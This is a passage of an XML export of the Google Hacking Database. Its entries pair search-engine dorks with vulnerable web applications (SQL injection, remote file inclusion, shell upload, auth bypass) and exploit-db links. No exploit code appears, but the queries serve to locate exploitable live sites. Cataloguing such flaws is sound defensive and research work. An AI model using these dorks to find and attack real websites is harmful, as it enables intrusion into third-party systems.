<textualDescription>PhotoKorn Gallery 1.52 (dir_path) Remote File Include Vulnerabilities - CVE: 2006-4670: https://www.exploit-db.com/exploits/2327</textualDescription>
<query>photokorn 1.52</query>
<querystring>https://www.google.com/search?q=photokorn+1.52</querystring>
<edb>https://www.exploit-db.com/exploits/2327</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3626</id>
<link>https://www.exploit-db.com/ghdb/3626</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>php Kolay Forum (php KF) © 2007 - 2010 phpKF Ekibi</shortDescription>
<textualDescription>Submitter: FreWaL CSRF Vulnerability: https://www.exploit-db.com/exploits/15685</textualDescription>
<query>php Kolay Forum (php KF) © 2007 - 2010 phpKF Ekibi</query>
<querystring>https://www.google.com/search?q=php+Kolay+Forum+(php+KF)+%C2%A9+2007+-+2010+phpKF+Ekibi</querystring>
<edb>https://www.exploit-db.com/exploits/15685</edb>
<date>2010-12-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>1674</id>
<link>https://www.exploit-db.com/ghdb/1674</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>php-addressbook v3.1.5</shortDescription>
<textualDescription>php-addressbook v3.1.5(edit.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10877</textualDescription>
<query>php-addressbook v3.1.5</query>
<querystring>https://www.google.com/search?q=php-addressbook+v3.1.5</querystring>
<edb>https://www.exploit-db.com/exploits/10877</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2232</id>
<link>https://www.exploit-db.com/ghdb/2232</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>phpBazar Ver. 2.1.0</shortDescription>
<textualDescription>phpBazar-2.1.1fix Remote Administration-Panel Vulnerability - CVE: 2009-4222: https://www.exploit-db.com/exploits/10233</textualDescription>
<query>phpBazar Ver. 2.1.0</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=phpBazar+Ver.+2.1.0</querystring>
<edb>https://www.exploit-db.com/exploits/10233</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2259</id>
<link>https://www.exploit-db.com/ghdb/2259</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>PHPEmailManager</shortDescription>
<textualDescription>PHP Email Manager (remove.php ID) SQL Injection Vulnerability - CVE: 2009-3209: https://www.exploit-db.com/exploits/9470</textualDescription>
<query>PHPEmailManager</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=PHPEmailManager</querystring>
<edb>https://www.exploit-db.com/exploits/9470</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1914</id>
<link>https://www.exploit-db.com/ghdb/1914</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>PHPGénéalogie fonctionne sur un serveur PHP</shortDescription>
<textualDescription>PHPGenealogy 2.0 (DataDirectory) RFI Vulnerability - CVE: 2009-3541: https://www.exploit-db.com/exploits/9155</textualDescription>
<query>PHPGénéalogie fonctionne sur un serveur PHP</query>
<querystring>https://www.google.com/search?q=PHPG%C3%83%C2%A9n%C3%83%C2%A9alogie+fonctionne+sur+un+serveur+PHP</querystring>
<edb>https://www.exploit-db.com/exploits/9155</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1082</id>
<link>https://www.exploit-db.com/ghdb/1082</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php (0.9.6 | 0.9.7)</shortDescription>
<textualDescription>phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure,remote code execution, cross site scriptingsoftware:author site: http://phpldapadmin.sourceforge.net/description: phpLDAPadmin is a web-based LDAP client. It provides easy,anywhere-accessible, multi-language administration for your LDAP serverIf unpatched and vulnerable, a user can see any file on target system. A user can also execute arbitrary php code and system commands or craft a malicious url to include malicious client side code that will be executed in the security contest of the victim browser.</textualDescription>
<query>phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php (0.9.6 | 0.9.7)</query>
<querystring>https://www.google.com/search?q=phpLDAPadmin+intitle%3AphpLDAPadmin+filetype%3Aphp+inurl%3Atree.php+%7C+inurl%3Alogin.php+%7C+inurl%3Adonate.php+%280.9.6+%7C+0.9.7%29</querystring>
<edb></edb>
<date>2005-08-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>3587</id>
<link>https://www.exploit-db.com/ghdb/3587</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>pixelpost &quot;RSS 2.0&quot; &quot;ATOM feed&quot; &quot;Valid xHTML / Valid CSS&quot;</shortDescription>
<textualDescription>Pixelpost 1-5rc1-2 Remote Privilege Escalation Exploit - CVE: 2006-2889:
https://www.exploit-db.com/exploits/1868</textualDescription>
<query>pixelpost &quot;RSS 2.0&quot; &quot;ATOM feed&quot; &quot;Valid xHTML / Valid CSS&quot;</query>
<querystring>https://www.google.com/search?q=pixelpost+%22RSS+2.0%22+%22ATOM+feed%22+%22Valid+xHTML+/+Valid+CSS</querystring>
<edb>https://www.exploit-db.com/exploits/1868</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2914</id>
<link>https://www.exploit-db.com/ghdb/2914</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Platform Dokeos 1.8.4 © 2007</shortDescription>
<textualDescription>Dokeos 1.8.4 Bypass Upload Shell From Your Profile Vulnerability - CVE: 2007-6479: https://www.exploit-db.com/exploits/4753</textualDescription>
<query>Platform Dokeos 1.8.4 © 2007</query>
<querystring>https://www.google.com/search?q=Platform+Dokeos+1.8.4+%C3%82%C2%A9+2007</querystring>
<edb>https://www.exploit-db.com/exploits/4753</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3469</id>
<link>https://www.exploit-db.com/ghdb/3469</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Portal By vbPortal Version 3.5.0</shortDescription>
<textualDescription>vbPortal 3.0.2 3.6.0 b1 (cookie) Remote Code Excution - CVE: 2006-4004: https://www.exploit-db.com/exploits/2087</textualDescription>
<query>Portal By vbPortal Version 3.5.0</query>
<querystring>https://www.google.com/search?q=Portal+By+vbPortal+Version+3.5.0+%3C%3D+3.6.0+Beta+1</querystring>
<edb>https://www.exploit-db.com/exploits/2087</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2818</id>
<link>https://www.exploit-db.com/ghdb/2818</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Power by donghungx. Copyright © 2008 AttMp3.com. All rights reserved.</shortDescription>
<textualDescription>SongForever.com Clone Shell Upload Vulnerability: https://www.exploit-db.com/exploits/11476</textualDescription>
<query>Power by donghungx. Copyright © 2008 AttMp3.com. All rights reserved.</query>
<querystring>https://www.google.com/search?q=Power+by+donghungx.+Copyright+%C2%A9+2008+AttMp3.com.+All+rights+reserved.</querystring>
<edb>https://www.exploit-db.com/exploits/11476</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1579</id>
<link>https://www.exploit-db.com/ghdb/1579</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Power by PHP Classifieds</shortDescription>
<textualDescription>Pre PHP Classifieds SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13992</textualDescription>
<query>Power by PHP Classifieds</query>
<querystring>https://www.google.com/search?q=Power+by+PHP+Classifieds</querystring>
<edb>https://www.exploit-db.com/exploits/13992</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2350</id>
<link>https://www.exploit-db.com/ghdb/2350</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Power with ecsportal rel 6.5</shortDescription>
<textualDescription>ecsportal rel 6.5 (article_view_photo.php id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8848</textualDescription>
<query>Power with ecsportal rel 6.5</query>
<querystring>https://www.google.com/search?q=Power+with+ecsportal+rel+6.5</querystring>
<edb>https://www.exploit-db.com/exploits/8848</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1867</id>
<link>https://www.exploit-db.com/ghdb/1867</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by &quot;vcart 3.3.2&quot;</shortDescription>
<textualDescription>vcart 3.3.2 Multiple Remote File Inclusion Vulnerabilities - CVE: 2008-0287: https://www.exploit-db.com/exploits/4889</textualDescription>
<query>Powered by &quot;vcart 3.3.2&quot;</query>
<querystring>https://www.google.com/search?q=Powered+by+%22vcart+3.3.2%22</querystring>
<edb>https://www.exploit-db.com/exploits/4889</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3276</id>
<link>https://www.exploit-db.com/ghdb/3276</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by 2532|Gigs v1.2.2</shortDescription>
<textualDescription>2532|Gigs 1.2.2 Stable Multiple Remote Vulnerabilities - CVE: 2008-6901: https://www.exploit-db.com/exploits/7510</textualDescription>
<query>Powered by 2532|Gigs v1.2.2</query>
<querystring>https://www.google.com/search?q=Powered+by+2532|Gigs+v1.2.2</querystring>
<edb>https://www.exploit-db.com/exploits/7510</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1514</id>
<link>https://www.exploit-db.com/ghdb/1514</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by 35mm Slide Gallery</shortDescription>
<textualDescription>35mm Slide Gallery Directory Traversal Vulnerability: https://www.exploit-db.com/exploits/10614</textualDescription>
<query>powered by 35mm Slide Gallery</query>
<querystring>https://www.google.com/search?q=powered+by+35mm+Slide+Gallery</querystring>
<edb>https://www.exploit-db.com/exploits/10614</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1771</id>
<link>https://www.exploit-db.com/ghdb/1771</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by 6rbScript</shortDescription>
<textualDescription>6rbScript (news.php newsid) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5663</textualDescription>
<query>Powered by 6rbScript</query>
<querystring>https://www.google.com/search?q=Powered+by+6rbScript</querystring>
<edb>https://www.exploit-db.com/exploits/5663</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2306</id>
<link>https://www.exploit-db.com/ghdb/2306</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By : PersianBB.com</shortDescription>
<textualDescription>PersianBB (iranian_music.php id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6858</textualDescription>
<query>Powered By : PersianBB.com</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Powered+By+:++PersianBB.com</querystring>
<edb>https://www.exploit-db.com/exploits/6858</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3134</id>
<link>https://www.exploit-db.com/ghdb/3134</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Ac4p.com Gallery v1.0 , Copyright© 2007 ac4p.com</shortDescription>
<textualDescription>Ac4p.com Gallery v1.0 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/11519</textualDescription>
<query>Powered by Ac4p.com Gallery v1.0 , Copyright© 2007 ac4p.com</query>
<querystring>https://www.google.com/search?q=Powered+by+Ac4p.com+Gallery+v1.0+,+Copyright%C2%A9+2007+ac4p.com</querystring>
<edb>https://www.exploit-db.com/exploits/11519</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1455</id>
<link>https://www.exploit-db.com/ghdb/1455</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Active PHP Bookmarks v1.1.02</shortDescription>
<textualDescription>Active PHP Bookmarks 1.1.02 Remote SQL Injection Vulnerability - CVE: 2008-3748: https://www.exploit-db.com/exploits/6277</textualDescription>
<query>Powered by Active PHP Bookmarks v1.1.02</query>
<querystring>https://www.google.com/search?q=Powered+by+Active+PHP+Bookmarks+v1.1.02</querystring>
<edb>https://www.exploit-db.com/exploits/6277</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2257</id>
<link>https://www.exploit-db.com/ghdb/2257</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by AirvaeCommerce 3.0</shortDescription>
<textualDescription>AirvaeCommerce 3.0 (pid) Remote SQL Injection Vulnerability - CVE: 2008-5223: https://www.exploit-db.com/exploits/5689</textualDescription>
<query>powered by AirvaeCommerce 3.0</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=powered+by+AirvaeCommerce+3.0</querystring>
<edb>https://www.exploit-db.com/exploits/5689</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2074</id>
<link>https://www.exploit-db.com/ghdb/2074</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By AJ Auction</shortDescription>
<textualDescription>AJ Auction v1 (id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5868</textualDescription>
<query>Powered By AJ Auction</query>
<querystring>https://www.google.com/search?q=Powered+By+AJ+Auction</querystring>
<edb>https://www.exploit-db.com/exploits/5868</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2292</id>
<link>https://www.exploit-db.com/ghdb/2292</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By AJ Auction</shortDescription>
<textualDescription>AJ Auction Pro Platinum (seller_id) SQL Injection Vulnerability - CVE: 2008-6004: https://www.exploit-db.com/exploits/6561</textualDescription>
<query>Powered By AJ Auction</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Powered+By+AJ+Auction</querystring>
<edb>https://www.exploit-db.com/exploits/6561</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1472</id>
<link>https://www.exploit-db.com/ghdb/1472</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By AJ Auction Web</shortDescription>
<textualDescription>AJ Auction Web 2.0 (cate_id) SQL Injection Vulnerability - CVE: 2008-2860: https://www.exploit-db.com/exploits/5867</textualDescription>
<query>Powered By AJ Auction Web</query>
<querystring>https://www.google.com/search?q=Powered+By+AJ+Auction+Web</querystring>
<edb>https://www.exploit-db.com/exploits/5867</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3447</id>
<link>https://www.exploit-db.com/ghdb/3447</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>POWERED BY ALITALK</shortDescription>
<textualDescription>ALITALK 1.9.1.1 Multiple Remote Vulnerabilities - CVE: 2008-0371: https://www.exploit-db.com/exploits/4922</textualDescription>
<query>POWERED BY ALITALK</query>
<querystring>https://www.google.com/search?q=POWERED+BY+ALITALK</querystring>
<edb>https://www.exploit-db.com/exploits/4922</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1484</id>
<link>https://www.exploit-db.com/ghdb/1484</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By AlstraSoft Video Share Enterprise</shortDescription>
<textualDescription>AlstraSoft Video Share Enterprise 4.5.1 (UID) SQL Injection Vulnerability - CVE: 2008-3386: https://www.exploit-db.com/exploits/6092</textualDescription>
<query>Powered By AlstraSoft Video Share Enterprise</query>
<querystring>https://www.google.com/search?q=Powered+By+AlstraSoft+Video+Share+Enterprise</querystring>
<edb>https://www.exploit-db.com/exploits/6092</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2660</id>
<link>https://www.exploit-db.com/ghdb/2660</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by AM4SS 1.0</shortDescription>
<textualDescription>Advneced Management For Services Sites (File Disclosure) Vulnerabilities: https://www.exploit-db.com/exploits/12859</textualDescription>
<query>Powered by AM4SS 1.0</query>
<querystring>https://www.google.com/search?q=Powered+by+AM4SS+1.0</querystring>
<edb>https://www.exploit-db.com/exploits/12859</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2118</id>
<link>https://www.exploit-db.com/ghdb/2118</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by apt-webservice ;apt-webshop-system v3.0</shortDescription>
<textualDescription>APT-WEBSHOP-SYSTEM modules.php SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14528</textualDescription>
<query>powered by apt-webservice ;apt-webshop-system v3.0</query>
<querystring>https://www.google.com/search?q=powered+by+apt-webservice+;apt-webshop-system+v3.0</querystring>
<edb>https://www.exploit-db.com/exploits/14528</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2186</id>
<link>https://www.exploit-db.com/ghdb/2186</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Arctic v2.0.0</shortDescription>
<textualDescription>Artic Issue Tracker 2.0.0 (index.php filter) SQL Injection Vulnerability - CVE: 2008-3250: https://www.exploit-db.com/exploits/6097</textualDescription>
<query>Powered by Arctic v2.0.0</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Powered+by+Arctic+v2.0.0</querystring>
<edb>https://www.exploit-db.com/exploits/6097</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2215</id>
<link>https://www.exploit-db.com/ghdb/2215</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Article DashBoard</shortDescription>
<textualDescription>Article Friendly SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11530</textualDescription>
<query>Powered by Article DashBoard</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Powered+by+Article+DashBoard</querystring>
<edb>https://www.exploit-db.com/exploits/11530</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2667</id>
<link>https://www.exploit-db.com/ghdb/2667</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Article Directory</shortDescription>
<textualDescription>Authenication Bypass Vulnerability in Articles Directory: https://www.exploit-db.com/exploits/12445</textualDescription>
<query>Powered by Article Directory</query>
<querystring>https://www.google.com/search?q=Powered+by+Article+Directory</querystring>
<edb>https://www.exploit-db.com/exploits/12445</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2253</id>
<link>https://www.exploit-db.com/ghdb/2253</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by ArticleMS from ArticleTrader</shortDescription>
<textualDescription>Article Management System 2.1.2 Reinstall Vulnerability: https://www.exploit-db.com/exploits/12858</textualDescription>
<query>Powered by ArticleMS from ArticleTrader</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Powered+by+ArticleMS+from+ArticleTrader</querystring>
<edb>https://www.exploit-db.com/exploits/12858</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1988</id>
<link>https://www.exploit-db.com/ghdb/1988</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by ArticlesOne.com oR Website Powered by ArticlesOne.com</shortDescription>
<textualDescription>ArticlesOne 07232006 (page) Remote Include Vulnerability: https://www.exploit-db.com/exploits/2063</textualDescription>
<query>Powered by ArticlesOne.com oR Website Powered by ArticlesOne.com</query>
<querystring>https://www.google.com/search?q=Powered+by+ArticlesOne.com+oR+Website+Powered+by+ArticlesOne.com</querystring>
<edb>https://www.exploit-db.com/exploits/2063</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1470</id>
<link>https://www.exploit-db.com/ghdb/1470</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by AspDownload</shortDescription>
<textualDescription>ASP Download 1.03 Arbitrary Change Administrator Account Vulnerability - CVE: 2008-6739: https://www.exploit-db.com/exploits/5780</textualDescription>
<query>Powered by AspDownload</query>
<querystring>https://www.google.com/search?q=Powered+by+AspDownload</querystring>
<edb>https://www.exploit-db.com/exploits/5780</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2391</id>
<link>https://www.exploit-db.com/ghdb/2391</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By AstroSPACES</shortDescription>
<textualDescription>AstroSPACES (id) Remote SQL Injection Vulnerability - CVE: 2008-4642: https://www.exploit-db.com/exploits/6758</textualDescription>
<query>Powered By AstroSPACES</query>
<querystring>https://www.google.com/search?q=Powered+By+AstroSPACES</querystring>
<edb>https://www.exploit-db.com/exploits/6758</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1704</id>
<link>https://www.exploit-db.com/ghdb/1704</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by BKWorks ProPHP Version 0.50 Beta 1</shortDescription>
<textualDescription>BKWorks ProPHP 0.50b1 (Auth Bypass) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/7726</textualDescription>
<query>Powered by BKWorks ProPHP Version 0.50 Beta 1</query>
<querystring>https://www.google.com/search?q=Powered+by+BKWorks+ProPHP+Version+0.50+Beta+1</querystring>
<edb>https://www.exploit-db.com/exploits/7726</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1855</id>
<link>https://www.exploit-db.com/ghdb/1855</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Blox CMS from TownNews.com</shortDescription>
<textualDescription>Blox CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12729</textualDescription>
<query>Powered by Blox CMS from TownNews.com</query>
<querystring>https://www.google.com/search?q=Powered+by+Blox+CMS+from+TownNews.com</querystring>
<edb>https://www.exploit-db.com/exploits/12729</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2548</id>
<link>https://www.exploit-db.com/ghdb/2548</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by boastMachine v3.1</shortDescription>
<textualDescription>boastMachine 3.1 (mail.php id) SQL Injection Vulnerability - CVE: 2008-0422: https://www.exploit-db.com/exploits/4952</textualDescription>
<query>Powered by boastMachine v3.1</query>
<querystring>https://www.google.com/search?q=Powered+by+boastMachine+v3.1</querystring>
<edb>https://www.exploit-db.com/exploits/4952</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2249</id>
<link>https://www.exploit-db.com/ghdb/2249</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by BoutikOne®</shortDescription>
<textualDescription>BoutikOne v1 SQL Injection Vulnerability - CVE: 2010-3479: https://www.exploit-db.com/exploits/15049</textualDescription>
<query>Powered by BoutikOne®</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Powered+by+BoutikOne%C2%AE</querystring>
<edb>https://www.exploit-db.com/exploits/15049</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3126</id>
<link>https://www.exploit-db.com/ghdb/3126</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Bug Software intext:Your Cart Contains</shortDescription>
<textualDescription>BugMall Shopping Cart 2.5 (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2007-3448: https://www.exploit-db.com/exploits/4103</textualDescription>
<query>Powered by Bug Software intext:Your Cart Contains</query>
<querystring>https://www.google.com/search?q=Powered+by+Bug+Software+intext:Your+Cart+Contains</querystring>
<edb>https://www.exploit-db.com/exploits/4103</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1590</id>
<link>https://www.exploit-db.com/ghdb/1590</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by CMSbright © websens</shortDescription>
<textualDescription>CMSbright (id_rub_page) Remote SQL Injection Vulnerability - CVE: 2008-6991: https://www.exploit-db.com/exploits/6343</textualDescription>
<query>powered by CMSbright © websens</query>
<querystring>https://www.google.com/search?q=powered+by+CMSbright+%C3%82%C2%A9+websens</querystring>
<edb>https://www.exploit-db.com/exploits/6343</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3207</id>
<link>https://www.exploit-db.com/ghdb/3207</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by CMScout (c)2005 CMScout Group</shortDescription>
<textualDescription>CMScout 2.08 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12407</textualDescription>
<query>Powered by CMScout (c)2005 CMScout Group</query>
<querystring>https://www.google.com/search?q=Powered+by+CMScout+(c)2005+CMScout+Group</querystring>
<edb>https://www.exploit-db.com/exploits/12407</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2492</id>
<link>https://www.exploit-db.com/ghdb/2492</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by CMScout (c)2005 CMScout Group</shortDescription>
<textualDescription>CMScout (XSS/HTML Injection) Multiple Vulnerabilities - CVE: 2010-2154: https://www.exploit-db.com/exploits/12806</textualDescription>
<query>Powered by CMScout (c)2005 CMScout Group</query>
<querystring>https://www.google.com/search?q=Powered+by+CMScout+(c)2005+CMScout+Group</querystring>
<edb>https://www.exploit-db.com/exploits/12806</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2943</id>
<link>https://www.exploit-db.com/ghdb/2943</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by CMScout (c)2005 CMScout Group</shortDescription>
<textualDescription>CMScout 2.06 SQL Injection/Local File Inclusion Vulnerabilities - CVE: 2008-6725: https://www.exploit-db.com/exploits/7625</textualDescription>
<query>Powered by CMScout (c)2005 CMScout Group</query>
<querystring>https://www.google.com/search?q=Powered+by+CMScout+%28c%292005+CMScout+Group</querystring>
<edb>https://www.exploit-db.com/exploits/7625</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3210</id>
<link>https://www.exploit-db.com/ghdb/3210</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Comersus v6 Shopping Cart</shortDescription>
<textualDescription>Comersus Shopping Cart v6 Remote User Pass: https://www.exploit-db.com/exploits/7736</textualDescription>
<query>Powered by Comersus v6 Shopping Cart</query>
<querystring>https://www.google.com/search?q=Powered+by+Comersus+v6+Shopping+Cart</querystring>
<edb>https://www.exploit-db.com/exploits/7736</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3087</id>
<link>https://www.exploit-db.com/ghdb/3087</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by connectix boards</shortDescription>
<textualDescription>Connectix Boards 0.8.2 template_path Remote File Inclusion - CVE: 2008-0502: https://www.exploit-db.com/exploits/5012</textualDescription>
<query>powered by connectix boards</query>
<querystring>https://www.google.com/search?q=powered+by+connectix+boards</querystring>
<edb>https://www.exploit-db.com/exploits/5012</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1909</id>
<link>https://www.exploit-db.com/ghdb/1909</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By Coppermine Photo Gallery v1.2.2b /Powered By Coppermine</shortDescription>
<textualDescription>Coppermine Photo Gallery 1.2.2b (Nuke Addon) Include Vulnerability: https://www.exploit-db.com/exploits/2375</textualDescription>
<query>Powered By Coppermine Photo Gallery v1.2.2b /Powered By Coppermine</query>
<querystring>https://www.google.com/search?q=Powered+By+Coppermine+Photo+Gallery+v1.2.2b+/Powered+By+Coppermine</querystring>
<edb>https://www.exploit-db.com/exploits/2375</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2781</id>
<link>https://www.exploit-db.com/ghdb/2781</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by cP Creator v2.7.1</shortDescription>
<textualDescription>cP Creator v2.7.1 Remote Sql Injection - CVE: 2009-3330: https://www.exploit-db.com/exploits/9726</textualDescription>
<query>Powered by cP Creator v2.7.1</query>
<querystring>https://www.google.com/search?q=Powered+by+cP+Creator+v2.7.1</querystring>
<edb>https://www.exploit-db.com/exploits/9726</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1894</id>
<link>https://www.exploit-db.com/ghdb/1894</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by CS-Cart - Shopping Cart Software</shortDescription>
<textualDescription>CS-Cart 1.3.3 (classes_dir) Remote File Include Vulnerability - CVE: 2006-2863: https://www.exploit-db.com/exploits/1872</textualDescription>
<query>Powered by CS-Cart - Shopping Cart Software</query>
<querystring>https://www.google.com/search?q=Powered+by+CS-Cart+-+Shopping+Cart+Software</querystring>
<edb>https://www.exploit-db.com/exploits/1872</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1875</id>
<link>https://www.exploit-db.com/ghdb/1875</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By DataLife Engine</shortDescription>
<textualDescription>DataLife Engine 8.2 dle_config_api Remote File Inclusion Vulnerability - CVE: 2009-3055: https://www.exploit-db.com/exploits/9572</textualDescription>
<query>Powered By DataLife Engine</query>
<querystring>https://www.google.com/search?q=Powered+By+DataLife+Engine</querystring>
<edb>https://www.exploit-db.com/exploits/9572</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3071</id>
<link>https://www.exploit-db.com/ghdb/3071</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Dayfox Designs This is a port of WordPress</shortDescription>
<textualDescription>Dayfox Blog 4 Multiple Local File Inclusion Vulnerabilities - CVE: 2008-3564: https://www.exploit-db.com/exploits/6203</textualDescription>
<query>Powered by Dayfox Designs This is a port of WordPress</query>
